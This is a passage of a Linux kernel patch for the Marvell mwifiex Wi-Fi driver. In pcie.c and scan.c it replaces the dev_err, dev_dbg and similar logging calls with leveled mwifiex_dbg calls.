(mwifiex_read_reg(adapter, PCIE_CPU_INT_STATUS, &ireg_intr)) { - dev_err(adapter->dev, "%s: Failed to read " - "interrupt status during fw dnld.\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: Failed to read\t" + "interrupt status during fw dnld.\n", + __func__); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); ret = -1; @@ -1953,8 +1987,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, offset += txlen; } while (true); - dev_notice(adapter->dev, - "info: FW download over, size %d bytes\n", offset); + mwifiex_dbg(adapter, MSG, + "info: FW download over, size %d bytes\n", offset); ret = 0; @@ -1980,15 +2014,17 @@ mwifiex_check_fw_status(struct mwifiex_adapter *adapter, u32 poll_num) /* Mask spurios interrupts */ if (mwifiex_write_reg(adapter, PCIE_HOST_INT_STATUS_MASK, HOST_INTR_MASK)) { - dev_warn(adapter->dev, "Write register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Write register failed\n"); return -1; } - dev_dbg(adapter->dev, "Setting driver ready signature\n"); + 
mwifiex_dbg(adapter, INFO, + "Setting driver ready signature\n"); if (mwifiex_write_reg(adapter, reg->drv_rdy, FIRMWARE_READY_PCIE)) { - dev_err(adapter->dev, - "Failed to write driver ready signature\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write driver ready signature\n"); return -1; } @@ -2015,12 +2051,13 @@ mwifiex_check_fw_status(struct mwifiex_adapter *adapter, u32 poll_num) &winner_status)) ret = -1; else if (!winner_status) { - dev_err(adapter->dev, "PCI-E is the winner\n"); + mwifiex_dbg(adapter, INFO, + "PCI-E is the winner\n"); adapter->winner = 1; } else { - dev_err(adapter->dev, - "PCI-E is not the winner <%#x,%d>, exit dnld\n", - ret, adapter->winner); + mwifiex_dbg(adapter, ERROR, + "PCI-E is not the winner <%#x,%d>, exit dnld\n", + ret, adapter->winner); } } @@ -2039,7 +2076,7 @@ static void mwifiex_interrupt_status(struct mwifiex_adapter *adapter) return; if (mwifiex_read_reg(adapter, PCIE_HOST_INT_STATUS, &pcie_ireg)) { - dev_warn(adapter->dev, "Read register failed\n"); + mwifiex_dbg(adapter, ERROR, "Read register failed\n"); return; } @@ -2050,7 +2087,8 @@ static void mwifiex_interrupt_status(struct mwifiex_adapter *adapter) /* Clear the pending interrupts */ if (mwifiex_write_reg(adapter, PCIE_HOST_INT_STATUS, ~pcie_ireg)) { - dev_warn(adapter->dev, "Write register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Write register failed\n"); return; } spin_lock_irqsave(&adapter->int_lock, flags); @@ -2133,21 +2171,24 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) while (pcie_ireg & HOST_INTR_MASK) { if (pcie_ireg & HOST_INTR_DNLD_DONE) { pcie_ireg &= ~HOST_INTR_DNLD_DONE; - dev_dbg(adapter->dev, "info: TX DNLD Done\n"); + mwifiex_dbg(adapter, INTR, + "info: TX DNLD Done\n"); ret = mwifiex_pcie_send_data_complete(adapter); if (ret) return ret; } if (pcie_ireg & HOST_INTR_UPLD_RDY) { pcie_ireg &= ~HOST_INTR_UPLD_RDY; - dev_dbg(adapter->dev, "info: Rx DATA\n"); + mwifiex_dbg(adapter, INTR, + "info: Rx DATA\n"); ret = mwifiex_pcie_process_recv_data(adapter); if (ret) return ret; } if (pcie_ireg & HOST_INTR_EVENT_RDY) { pcie_ireg &= ~HOST_INTR_EVENT_RDY; - dev_dbg(adapter->dev, "info: Rx EVENT\n"); + mwifiex_dbg(adapter, INTR, + "info: Rx EVENT\n"); ret = mwifiex_pcie_process_event_ready(adapter); if (ret) return ret; @@ -2156,8 +2197,8 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) if (pcie_ireg & HOST_INTR_CMD_DONE) { pcie_ireg &= ~HOST_INTR_CMD_DONE; if (adapter->cmd_sent) { - dev_dbg(adapter->dev, - "info: CMD sent Interrupt\n"); + mwifiex_dbg(adapter, INTR, + "info: CMD sent Interrupt\n"); adapter->cmd_sent = false; } /* Handle command response */ @@ -2169,8 +2210,8 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) if (mwifiex_pcie_ok_to_access_hw(adapter)) { if (mwifiex_read_reg(adapter, PCIE_HOST_INT_STATUS, &pcie_ireg)) { - dev_warn(adapter->dev, - "Read register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Read register failed\n"); return -1; } @@ -2178,16 +2219,17 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) if (mwifiex_write_reg(adapter, PCIE_HOST_INT_STATUS, ~pcie_ireg)) { - dev_warn(adapter->dev, - "Write register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Write register failed\n"); return -1; } } } } - dev_dbg(adapter->dev, "info: cmd_sent=%d data_sent=%d\n", - adapter->cmd_sent, adapter->data_sent); + mwifiex_dbg(adapter, INTR, + "info: cmd_sent=%d data_sent=%d\n", + adapter->cmd_sent, adapter->data_sent); if (adapter->ps_state != PS_STATE_SLEEP) 
mwifiex_pcie_enable_host_int(adapter); @@ -2209,7 +2251,8 @@ static int mwifiex_pcie_host_to_card(struct mwifiex_adapter *adapter, u8 type, struct mwifiex_tx_param *tx_param) { if (!skb) { - dev_err(adapter->dev, "Passed NULL skb to %s\n", __func__); + mwifiex_dbg(adapter, ERROR, + "Passed NULL skb to %s\n", __func__); return -1; } @@ -2232,7 +2275,8 @@ mwifiex_pcie_rdwr_firmware(struct mwifiex_adapter *adapter, u8 doneflag) ret = mwifiex_write_reg(adapter, reg->fw_dump_ctrl, FW_DUMP_HOST_READY); if (ret) { - dev_err(adapter->dev, "PCIE write err\n"); + mwifiex_dbg(adapter, ERROR, + "PCIE write err\n"); return RDWR_STATUS_FAILURE; } @@ -2243,19 +2287,20 @@ mwifiex_pcie_rdwr_firmware(struct mwifiex_adapter *adapter, u8 doneflag) if (doneflag && ctrl_data == doneflag) return RDWR_STATUS_DONE; if (ctrl_data != FW_DUMP_HOST_READY) { - dev_info(adapter->dev, - "The ctrl reg was changed, re-try again!\n"); + mwifiex_dbg(adapter, WARN, + "The ctrl reg was changed, re-try again!\n"); ret = mwifiex_write_reg(adapter, reg->fw_dump_ctrl, FW_DUMP_HOST_READY); if (ret) { - dev_err(adapter->dev, "PCIE write err\n"); + mwifiex_dbg(adapter, ERROR, + "PCIE write err\n"); return RDWR_STATUS_FAILURE; } } usleep_range(100, 200); } - dev_err(adapter->dev, "Fail to pull ctrl_data\n"); + mwifiex_dbg(adapter, ERROR, "Fail to pull ctrl_data\n"); return RDWR_STATUS_FAILURE; } @@ -2284,7 +2329,7 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) entry->mem_size = 0; } - dev_info(adapter->dev, "== mwifiex firmware dump start ==\n"); + mwifiex_dbg(adapter, DUMP, "== mwifiex firmware dump start ==\n"); /* Read the number of the memories which will dump */ stat = mwifiex_pcie_rdwr_firmware(adapter, doneflag); @@ -2311,31 +2356,31 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) } if (memory_size == 0) { - dev_info(adapter->dev, "Firmware dump Finished!\n"); + mwifiex_dbg(adapter, MSG, "Firmware dump Finished!\n"); ret = mwifiex_write_reg(adapter, creg->fw_dump_ctrl, FW_DUMP_READ_DONE); if (ret) { - dev_err(adapter->dev, "PCIE write err\n"); + mwifiex_dbg(adapter, ERROR, "PCIE write err\n"); goto done; } break; } - dev_info(adapter->dev, - "%s_SIZE=0x%x\n", entry->mem_name, memory_size); + mwifiex_dbg(adapter, DUMP, + "%s_SIZE=0x%x\n", entry->mem_name, memory_size); entry->mem_ptr = vmalloc(memory_size + 1); entry->mem_size = memory_size; if (!entry->mem_ptr) { - dev_err(adapter->dev, - "Vmalloc %s failed\n", entry->mem_name); + mwifiex_dbg(adapter, ERROR, + "Vmalloc %s failed\n", entry->mem_name); goto done; } dbg_ptr = entry->mem_ptr; end_ptr = dbg_ptr + memory_size; doneflag = entry->done_flag; - dev_info(adapter->dev, "Start %s output, please wait...\n", - entry->mem_name); + mwifiex_dbg(adapter, DUMP, "Start %s output, please wait...\n", + entry->mem_name); do { stat = mwifiex_pcie_rdwr_firmware(adapter, doneflag); @@ -2349,8 +2394,8 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) if (dbg_ptr < end_ptr) { dbg_ptr++; } else { - dev_err(adapter->dev, - "Allocated buf not enough\n"); + mwifiex_dbg(adapter, ERROR, + "Allocated buf not enough\n"); goto done; } } @@ -2358,12 +2403,13 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) if (stat != RDWR_STATUS_DONE) continue; - dev_info(adapter->dev, "%s done: size=0x%tx\n", - entry->mem_name, dbg_ptr - entry->mem_ptr); + mwifiex_dbg(adapter, DUMP, + "%s done: size=0x%tx\n", + entry->mem_name, dbg_ptr - entry->mem_ptr); break; } while (true); } - dev_info(adapter->dev, "== 
mwifiex firmware dump end ==\n"); + mwifiex_dbg(adapter, MSG, "== mwifiex firmware dump end ==\n"); kobject_uevent_env(&adapter->wiphy->dev.kobj, KOBJ_CHANGE, env); @@ -2418,45 +2464,50 @@ static int mwifiex_pcie_init(struct mwifiex_adapter *adapter) pci_set_master(pdev); - dev_dbg(adapter->dev, "try set_consistent_dma_mask(32)\n"); + mwifiex_dbg(adapter, INFO, + "try set_consistent_dma_mask(32)\n"); ret = pci_set_dma_mask(pdev, DMA_BIT_MASK(32)); if (ret) { - dev_err(adapter->dev, "set_dma_mask(32) failed\n"); + mwifiex_dbg(adapter, ERROR, + "set_dma_mask(32) failed\n"); goto err_set_dma_mask; } ret = pci_set_consistent_dma_mask(pdev, DMA_BIT_MASK(32)); if (ret) { - dev_err(adapter->dev, "set_consistent_dma_mask(64) failed\n"); + mwifiex_dbg(adapter, ERROR, + "set_consistent_dma_mask(64) failed\n"); goto err_set_dma_mask; } ret = pci_request_region(pdev, 0, DRV_NAME); if (ret) { - dev_err(adapter->dev, "req_reg(0) error\n"); + mwifiex_dbg(adapter, ERROR, + "req_reg(0) error\n"); goto err_req_region0; } card->pci_mmap = pci_iomap(pdev, 0, 0); if (!card->pci_mmap) { - dev_err(adapter->dev, "iomap(0) error\n"); + mwifiex_dbg(adapter, ERROR, "iomap(0) error\n"); ret = -EIO; goto err_iomap0; } ret = pci_request_region(pdev, 2, DRV_NAME); if (ret) { - dev_err(adapter->dev, "req_reg(2) error\n"); + mwifiex_dbg(adapter, ERROR, "req_reg(2) error\n"); goto err_req_region2; } card->pci_mmap1 = pci_iomap(pdev, 2, 0); if (!card->pci_mmap1) { - dev_err(adapter->dev, "iomap(2) error\n"); + mwifiex_dbg(adapter, ERROR, + "iomap(2) error\n"); ret = -EIO; goto err_iomap2; } - dev_dbg(adapter->dev, - "PCI memory map Virt0: %p PCI memory map Virt2: %p\n", - card->pci_mmap, card->pci_mmap1); + mwifiex_dbg(adapter, INFO, + "PCI memory map Virt0: %p PCI memory map Virt2: %p\n", + card->pci_mmap, card->pci_mmap1); card->cmdrsp_buf = NULL; ret = mwifiex_pcie_create_txbd_ring(adapter); @@ -2521,10 +2572,11 @@ static void mwifiex_pcie_cleanup(struct mwifiex_adapter *adapter) const struct mwifiex_pcie_card_reg *reg = card->pcie.reg; if (user_rmmod) { - dev_dbg(adapter->dev, "Clearing driver ready signature\n"); + mwifiex_dbg(adapter, INFO, + "Clearing driver ready signature\n"); if (mwifiex_write_reg(adapter, reg->drv_rdy, 0x00000000)) - dev_err(adapter->dev, - "Failed to write driver not-ready signature\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write driver not-ready signature\n"); } if (pdev) { @@ -2555,7 +2607,8 @@ static int mwifiex_register_dev(struct mwifiex_adapter *adapter) ret = request_irq(pdev->irq, mwifiex_pcie_interrupt, IRQF_SHARED, "MRVL_PCIE", pdev); if (ret) { - pr_err("request_irq failed: ret=%d\n", ret); + mwifiex_dbg(adapter, ERROR, + "request_irq failed: ret=%d\n", ret); adapter->card = NULL; return -1; } @@ -2582,7 +2635,8 @@ static void mwifiex_unregister_dev(struct mwifiex_adapter *adapter) const struct mwifiex_pcie_card_reg *reg; if (card) { - dev_dbg(adapter->dev, "%s(): calling free_irq()\n", __func__); + mwifiex_dbg(adapter, INFO, + "%s(): calling free_irq()\n", __func__); free_irq(card->dev->irq, card->dev); reg = card->pcie.reg; diff --git a/drivers/net/wireless/mwifiex/scan.c b/drivers/net/wireless/mwifiex/scan.c index 84843d1b0a04..baf9715ddc10 100644 --- a/drivers/net/wireless/mwifiex/scan.c +++ b/drivers/net/wireless/mwifiex/scan.c @@ -241,20 +241,21 @@ mwifiex_is_bss_wpa(struct mwifiex_private *priv, * LinkSys WRT54G && bss_desc->privacy */ ) { - dev_dbg(priv->adapter->dev, "info: %s: WPA:" - " wpa_ie=%#x wpa2_ie=%#x WEP=%s WPA=%s WPA2=%s " - "EncMode=%#x privacy=%#x\n", 
__func__, - (bss_desc->bcn_wpa_ie) ? - (*(bss_desc->bcn_wpa_ie)). - vend_hdr.element_id : 0, - (bss_desc->bcn_rsn_ie) ? - (*(bss_desc->bcn_rsn_ie)). - ieee_hdr.element_id : 0, - (priv->sec_info.wep_enabled) ? "e" : "d", - (priv->sec_info.wpa_enabled) ? "e" : "d", - (priv->sec_info.wpa2_enabled) ? "e" : "d", - priv->sec_info.encryption_mode, - bss_desc->privacy); + mwifiex_dbg(priv->adapter, INFO, + "info: %s: WPA:\t" + "wpa_ie=%#x wpa2_ie=%#x WEP=%s WPA=%s WPA2=%s\t" + "EncMode=%#x privacy=%#x\n", __func__, + (bss_desc->bcn_wpa_ie) ? + (*bss_desc->bcn_wpa_ie). + vend_hdr.element_id : 0, + (bss_desc->bcn_rsn_ie) ? + (*bss_desc->bcn_rsn_ie). + ieee_hdr.element_id : 0, + (priv->sec_info.wep_enabled) ? "e" : "d", + (priv->sec_info.wpa_enabled) ? "e" : "d", + (priv->sec_info.wpa2_enabled) ? "e" : "d", + priv->sec_info.encryption_mode, + bss_desc->privacy); return true; } return false; @@ -277,20 +278,21 @@ mwifiex_is_bss_wpa2(struct mwifiex_private *priv, * Privacy bit may NOT be set in some APs like * LinkSys WRT54G && bss_desc->privacy */ - dev_dbg(priv->adapter->dev, "info: %s: WPA2: " - " wpa_ie=%#x wpa2_ie=%#x WEP=%s WPA=%s WPA2=%s " - "EncMode=%#x privacy=%#x\n", __func__, - (bss_desc->bcn_wpa_ie) ? - (*(bss_desc->bcn_wpa_ie)). - vend_hdr.element_id : 0, - (bss_desc->bcn_rsn_ie) ? - (*(bss_desc->bcn_rsn_ie)). - ieee_hdr.element_id : 0, - (priv->sec_info.wep_enabled) ? "e" : "d", - (priv->sec_info.wpa_enabled) ? "e" : "d", - (priv->sec_info.wpa2_enabled) ? "e" : "d", - priv->sec_info.encryption_mode, - bss_desc->privacy); + mwifiex_dbg(priv->adapter, INFO, + "info: %s: WPA2:\t" + "wpa_ie=%#x wpa2_ie=%#x WEP=%s WPA=%s WPA2=%s\t" + "EncMode=%#x privacy=%#x\n", __func__, + (bss_desc->bcn_wpa_ie) ? + (*bss_desc->bcn_wpa_ie). + vend_hdr.element_id : 0, + (bss_desc->bcn_rsn_ie) ? + (*bss_desc->bcn_rsn_ie). + ieee_hdr.element_id : 0, + (priv->sec_info.wep_enabled) ? "e" : "d", + (priv->sec_info.wpa_enabled) ? "e" : "d", + (priv->sec_info.wpa2_enabled) ? "e" : "d", + priv->sec_info.encryption_mode, + bss_desc->privacy); return true; } return false; @@ -333,18 +335,19 @@ mwifiex_is_bss_dynamic_wep(struct mwifiex_private *priv, ((!bss_desc->bcn_rsn_ie) || ((*(bss_desc->bcn_rsn_ie)).ieee_hdr.element_id != WLAN_EID_RSN)) && priv->sec_info.encryption_mode && bss_desc->privacy) { - dev_dbg(priv->adapter->dev, "info: %s: dynamic " - "WEP: wpa_ie=%#x wpa2_ie=%#x " - "EncMode=%#x privacy=%#x\n", - __func__, - (bss_desc->bcn_wpa_ie) ? - (*(bss_desc->bcn_wpa_ie)). - vend_hdr.element_id : 0, - (bss_desc->bcn_rsn_ie) ? - (*(bss_desc->bcn_rsn_ie)). - ieee_hdr.element_id : 0, - priv->sec_info.encryption_mode, - bss_desc->privacy); + mwifiex_dbg(priv->adapter, INFO, + "info: %s: dynamic\t" + "WEP: wpa_ie=%#x wpa2_ie=%#x\t" + "EncMode=%#x privacy=%#x\n", + __func__, + (bss_desc->bcn_wpa_ie) ? + (*bss_desc->bcn_wpa_ie). + vend_hdr.element_id : 0, + (bss_desc->bcn_rsn_ie) ? + (*bss_desc->bcn_rsn_ie). 
+ ieee_hdr.element_id : 0, + priv->sec_info.encryption_mode, + bss_desc->privacy); return true; } return false; @@ -383,19 +386,20 @@ mwifiex_is_network_compatible(struct mwifiex_private *priv, return 0; if (priv->wps.session_enable) { - dev_dbg(adapter->dev, - "info: return success directly in WPS period\n"); + mwifiex_dbg(adapter, IOCTL, + "info: return success directly in WPS period\n"); return 0; } if (bss_desc->chan_sw_ie_present) { - dev_err(adapter->dev, - "Don't connect to AP with WLAN_EID_CHANNEL_SWITCH\n"); + mwifiex_dbg(adapter, INFO, + "Don't connect to AP with WLAN_EID_CHANNEL_SWITCH\n"); return -1; } if (mwifiex_is_bss_wapi(priv, bss_desc)) { - dev_dbg(adapter->dev, "info: return success for WAPI AP\n"); + mwifiex_dbg(adapter, INFO, + "info: return success for WAPI AP\n"); return 0; } @@ -405,7 +409,8 @@ mwifiex_is_network_compatible(struct mwifiex_private *priv, return 0; } else if (mwifiex_is_bss_static_wep(priv, bss_desc)) { /* Static WEP enabled */ - dev_dbg(adapter->dev, "info: Disable 11n in WEP mode.\n"); + mwifiex_dbg(adapter, INFO, + "info: Disable 11n in WEP mode.\n"); bss_desc->disable_11n = true; return 0; } else if (mwifiex_is_bss_wpa(priv, bss_desc)) { @@ -418,9 +423,9 @@ mwifiex_is_network_compatible(struct mwifiex_private *priv, if (mwifiex_is_wpa_oui_present (bss_desc, CIPHER_SUITE_TKIP)) { - dev_dbg(adapter->dev, - "info: Disable 11n if AES " - "is not supported by AP\n"); + mwifiex_dbg(adapter, INFO, + "info: Disable 11n if AES\t" + "is not supported by AP\n"); bss_desc->disable_11n = true; } else { return -1; @@ -437,9 +442,9 @@ mwifiex_is_network_compatible(struct mwifiex_private *priv, if (mwifiex_is_rsn_oui_present (bss_desc, CIPHER_SUITE_TKIP)) { - dev_dbg(adapter->dev, - "info: Disable 11n if AES " - "is not supported by AP\n"); + mwifiex_dbg(adapter, INFO, + "info: Disable 11n if AES\t" + "is not supported by AP\n"); bss_desc->disable_11n = true; } else { return -1; @@ -455,17 +460,18 @@ mwifiex_is_network_compatible(struct mwifiex_private *priv, } /* Security doesn't match */ - dev_dbg(adapter->dev, - "info: %s: failed: wpa_ie=%#x wpa2_ie=%#x WEP=%s " - "WPA=%s WPA2=%s EncMode=%#x privacy=%#x\n", __func__, - (bss_desc->bcn_wpa_ie) ? - (*(bss_desc->bcn_wpa_ie)).vend_hdr.element_id : 0, - (bss_desc->bcn_rsn_ie) ? - (*(bss_desc->bcn_rsn_ie)).ieee_hdr.element_id : 0, - (priv->sec_info.wep_enabled) ? "e" : "d", - (priv->sec_info.wpa_enabled) ? "e" : "d", - (priv->sec_info.wpa2_enabled) ? "e" : "d", - priv->sec_info.encryption_mode, bss_desc->privacy); + mwifiex_dbg(adapter, ERROR, + "info: %s: failed: wpa_ie=%#x wpa2_ie=%#x WEP=%s\t" + "WPA=%s WPA2=%s EncMode=%#x privacy=%#x\n", + __func__, + (bss_desc->bcn_wpa_ie) ? + (*bss_desc->bcn_wpa_ie).vend_hdr.element_id : 0, + (bss_desc->bcn_rsn_ie) ? + (*bss_desc->bcn_rsn_ie).ieee_hdr.element_id : 0, + (priv->sec_info.wep_enabled) ? "e" : "d", + (priv->sec_info.wpa_enabled) ? "e" : "d", + (priv->sec_info.wpa2_enabled) ? 
"e" : "d", + priv->sec_info.encryption_mode, bss_desc->privacy); return -1; } @@ -560,7 +566,8 @@ mwifiex_append_rate_tlv(struct mwifiex_private *priv, else rates_size = mwifiex_get_supported_rates(priv, rates); - dev_dbg(priv->adapter->dev, "info: SCAN_CMD: Rates size = %d\n", + mwifiex_dbg(priv->adapter, CMD, + "info: SCAN_CMD: Rates size = %d\n", rates_size); rates_tlv = (struct mwifiex_ie_types_rates_param_set *)tlv_pos; rates_tlv->header.type = cpu_to_le16(WLAN_EID_SUPP_RATES); @@ -600,9 +607,9 @@ mwifiex_scan_channel_list(struct mwifiex_private *priv, u8 radio_type; if (!scan_cfg_out || !chan_tlv_out || !scan_chan_list) { - dev_dbg(priv->adapter->dev, - "info: Scan: Null detect: %p, %p, %p\n", - scan_cfg_out, chan_tlv_out, scan_chan_list); + mwifiex_dbg(priv->adapter, ERROR, + "info: Scan: Null detect: %p, %p, %p\n", + scan_cfg_out, chan_tlv_out, scan_chan_list); return -1; } @@ -645,16 +652,16 @@ mwifiex_scan_channel_list(struct mwifiex_private *priv, } radio_type = tmp_chan_list->radio_type; - dev_dbg(priv->adapter->dev, - "info: Scan: Chan(%3d), Radio(%d)," - " Mode(%d, %d), Dur(%d)\n", - tmp_chan_list->chan_number, - tmp_chan_list->radio_type, - tmp_chan_list->chan_scan_mode_bitmap - & MWIFIEX_PASSIVE_SCAN, - (tmp_chan_list->chan_scan_mode_bitmap - & MWIFIEX_DISABLE_CHAN_FILT) >> 1, - le16_to_cpu(tmp_chan_list->max_scan_time)); + mwifiex_dbg(priv->adapter, INFO, + "info: Scan: Chan(%3d), Radio(%d),\t" + "Mode(%d, %d), Dur(%d)\n", + tmp_chan_list->chan_number, + tmp_chan_list->radio_type, + tmp_chan_list->chan_scan_mode_bitmap + & MWIFIEX_PASSIVE_SCAN, + (tmp_chan_list->chan_scan_mode_bitmap + & MWIFIEX_DISABLE_CHAN_FILT) >> 1, + le16_to_cpu(tmp_chan_list->max_scan_time)); /* Copy the current channel TLV to the command being prepared */ @@ -718,9 +725,11 @@ mwifiex_scan_channel_list(struct mwifiex_private *priv, /* The total scan time should be less than scan command timeout value */ if (total_scan_time > MWIFIEX_MAX_TOTAL_SCAN_TIME) { - dev_err(priv->adapter->dev, "total scan time %dms" - " is over limit (%dms), scan skipped\n", - total_scan_time, MWIFIEX_MAX_TOTAL_SCAN_TIME); + mwifiex_dbg(priv->adapter, ERROR, + "total scan time %dms\t" + "is over limit (%dms), scan skipped\n", + total_scan_time, + MWIFIEX_MAX_TOTAL_SCAN_TIME); ret = -1; break; } @@ -905,9 +914,10 @@ mwifiex_config_scan(struct mwifiex_private *priv, tlv_pos += (sizeof(wildcard_ssid_tlv->header) + le16_to_cpu(wildcard_ssid_tlv->header.len)); - dev_dbg(adapter->dev, "info: scan: ssid[%d]: %s, %d\n", - i, wildcard_ssid_tlv->ssid, - wildcard_ssid_tlv->max_ssid_length); + mwifiex_dbg(adapter, INFO, + "info: scan: ssid[%d]: %s, %d\n", + i, wildcard_ssid_tlv->ssid, + wildcard_ssid_tlv->max_ssid_length); /* Empty wildcard ssid with a maxlen will match many or potentially all SSIDs (maxlen == 32), therefore do @@ -928,8 +938,9 @@ mwifiex_config_scan(struct mwifiex_private *priv, *filtered_scan = true; if (user_scan_in->scan_chan_gap) { - dev_dbg(adapter->dev, "info: scan: channel gap = %d\n", - user_scan_in->scan_chan_gap); + mwifiex_dbg(adapter, INFO, + "info: scan: channel gap = %d\n", + user_scan_in->scan_chan_gap); *max_chan_per_scan = MWIFIEX_MAX_CHANNELS_PER_SPECIFIC_SCAN; @@ -961,8 +972,9 @@ mwifiex_config_scan(struct mwifiex_private *priv, add tlv */ if (num_probes) { - dev_dbg(adapter->dev, "info: scan: num_probes = %d\n", - num_probes); + mwifiex_dbg(adapter, INFO, + "info: scan: num_probes = %d\n", + num_probes); num_probes_tlv = (struct mwifiex_ie_types_num_probes *) tlv_pos; num_probes_tlv->header.type = 
cpu_to_le16(TLV_TYPE_NUMPROBES); @@ -1003,7 +1015,8 @@ mwifiex_config_scan(struct mwifiex_private *priv, if (user_scan_in && user_scan_in->chan_list[0].chan_number) { - dev_dbg(adapter->dev, "info: Scan: Using supplied channel list\n"); + mwifiex_dbg(adapter, INFO, + "info: Scan: Using supplied channel list\n"); for (chan_idx = 0; chan_idx < MWIFIEX_USER_SCAN_CHAN_MAX && @@ -1056,13 +1069,13 @@ mwifiex_config_scan(struct mwifiex_private *priv, (user_scan_in->chan_list[0].chan_number == priv->curr_bss_params.bss_descriptor.channel)) { *scan_current_only = true; - dev_dbg(adapter->dev, - "info: Scan: Scanning current channel only\n"); + mwifiex_dbg(adapter, INFO, + "info: Scan: Scanning current channel only\n"); } chan_num = chan_idx; } else { - dev_dbg(adapter->dev, - "info: Scan: Creating full region channel list\n"); + mwifiex_dbg(adapter, INFO, + "info: Scan: Creating full region channel list\n"); chan_num = mwifiex_scan_create_channel_list(priv, user_scan_in, scan_chan_list, *filtered_scan); @@ -1094,8 +1107,9 @@ mwifiex_ret_802_11_scan_get_tlv_ptrs(struct mwifiex_adapter *adapter, tlv_buf_left = tlv_buf_size; *tlv_data = NULL; - dev_dbg(adapter->dev, "info: SCAN_RESP: tlv_buf_size = %d\n", - tlv_buf_size); + mwifiex_dbg(adapter, INFO, + "info: SCAN_RESP: tlv_buf_size = %d\n", + tlv_buf_size); while (tlv_buf_left >= sizeof(struct mwifiex_ie_types_header)) { @@ -1103,26 +1117,31 @@ mwifiex_ret_802_11_scan_get_tlv_ptrs(struct mwifiex_adapter *adapter, tlv_len = le16_to_cpu(current_tlv->header.len); if (sizeof(tlv->header) + tlv_len > tlv_buf_left) { - dev_err(adapter->dev, "SCAN_RESP: TLV buffer corrupt\n"); + mwifiex_dbg(adapter, ERROR, + "SCAN_RESP: TLV buffer corrupt\n"); break; } if (req_tlv_type == tlv_type) { switch (tlv_type) { case TLV_TYPE_TSFTIMESTAMP: - dev_dbg(adapter->dev, "info: SCAN_RESP: TSF " - "timestamp TLV, len = %d\n", tlv_len); + mwifiex_dbg(adapter, INFO, + "info: SCAN_RESP: TSF\t" + "timestamp TLV, len = %d\n", + tlv_len); *tlv_data = current_tlv; break; case TLV_TYPE_CHANNELBANDLIST: - dev_dbg(adapter->dev, "info: SCAN_RESP: channel" - " band list TLV, len = %d\n", tlv_len); + mwifiex_dbg(adapter, INFO, + "info: SCAN_RESP: channel\t" + "band list TLV, len = %d\n", + tlv_len); *tlv_data = current_tlv; break; default: - dev_err(adapter->dev, - "SCAN_RESP: unhandled TLV = %d\n", - tlv_type); + mwifiex_dbg(adapter, ERROR, + "SCAN_RESP: unhandled TLV = %d\n", + tlv_type); /* Give up, this seems corrupted */ return; } @@ -1177,8 +1196,9 @@ int mwifiex_update_bss_desc_with_ie(struct mwifiex_adapter *adapter, total_ie_len = element_len + sizeof(struct ieee_types_header); if (bytes_left < total_ie_len) { - dev_err(adapter->dev, "err: InterpretIE: in processing" - " IE, bytes left < IE length\n"); + mwifiex_dbg(adapter, ERROR, + "err: InterpretIE: in processing\t" + "IE, bytes left < IE length\n"); return -1; } switch (element_id) { @@ -1186,9 +1206,9 @@ int mwifiex_update_bss_desc_with_ie(struct mwifiex_adapter *adapter, bss_entry->ssid.ssid_len = element_len; memcpy(bss_entry->ssid.ssid, (current_ptr + 2), element_len); - dev_dbg(adapter->dev, - "info: InterpretIE: ssid: %-32s\n", - bss_entry->ssid.ssid); + mwifiex_dbg(adapter, INFO, + "info: InterpretIE: ssid: %-32s\n", + bss_entry->ssid.ssid); break; case WLAN_EID_SUPP_RATES: @@ -1419,19 +1439,20 @@ int mwifiex_scan_networks(struct mwifiex_private *priv, unsigned long flags; if (adapter->scan_processing) { - dev_err(adapter->dev, "cmd: Scan already in process...\n"); + mwifiex_dbg(adapter, WARN, + "cmd: Scan already in 
process...\n"); return -EBUSY; } if (priv->scan_block) { - dev_err(adapter->dev, - "cmd: Scan is blocked during association...\n"); + mwifiex_dbg(adapter, WARN, + "cmd: Scan is blocked during association...\n"); return -EBUSY; } if (adapter->surprise_removed || adapter->is_cmd_timedout) { - dev_err(adapter->dev, - "Ignore scan. Card removed or firmware in bad state\n"); + mwifiex_dbg(adapter, ERROR, + "Ignore scan. Card removed or firmware in bad state\n"); return -EFAULT; } @@ -1478,7 +1499,8 @@ int mwifiex_scan_networks(struct mwifiex_private *priv, /* Perform internal scan synchronously */ if (!priv->scan_request) { - dev_dbg(adapter->dev, "wait internal scan\n"); + mwifiex_dbg(adapter, INFO, + "wait internal scan\n"); mwifiex_wait_queue_complete(adapter, cmd_node); } } else { @@ -1553,8 +1575,8 @@ int mwifiex_check_network_compatibility(struct mwifiex_private *priv, ret = mwifiex_is_network_compatible(priv, bss_desc, priv->bss_mode); if (ret) - dev_err(priv->adapter->dev, - "Incompatible network settings\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Incompatible network settings\n"); break; default: ret = 0; @@ -1656,7 +1678,8 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, */ if (curr_bcn_bytes < ETH_ALEN + sizeof(u8) + sizeof(struct mwifiex_fixed_bcn_param)) { - dev_err(adapter->dev, "InterpretIE: not enough bytes left\n"); + mwifiex_dbg(adapter, ERROR, + "InterpretIE: not enough bytes left\n"); return -EFAULT; } @@ -1669,7 +1692,8 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, rssi = (-rssi) * 100; /* Convert dBm to mBm */ current_ptr += sizeof(u8); curr_bcn_bytes -= sizeof(u8); - dev_dbg(adapter->dev, "info: InterpretIE: RSSI=%d\n", rssi); + mwifiex_dbg(adapter, INFO, + "info: InterpretIE: RSSI=%d\n", rssi); } else { rssi = rssi_val; } @@ -1682,14 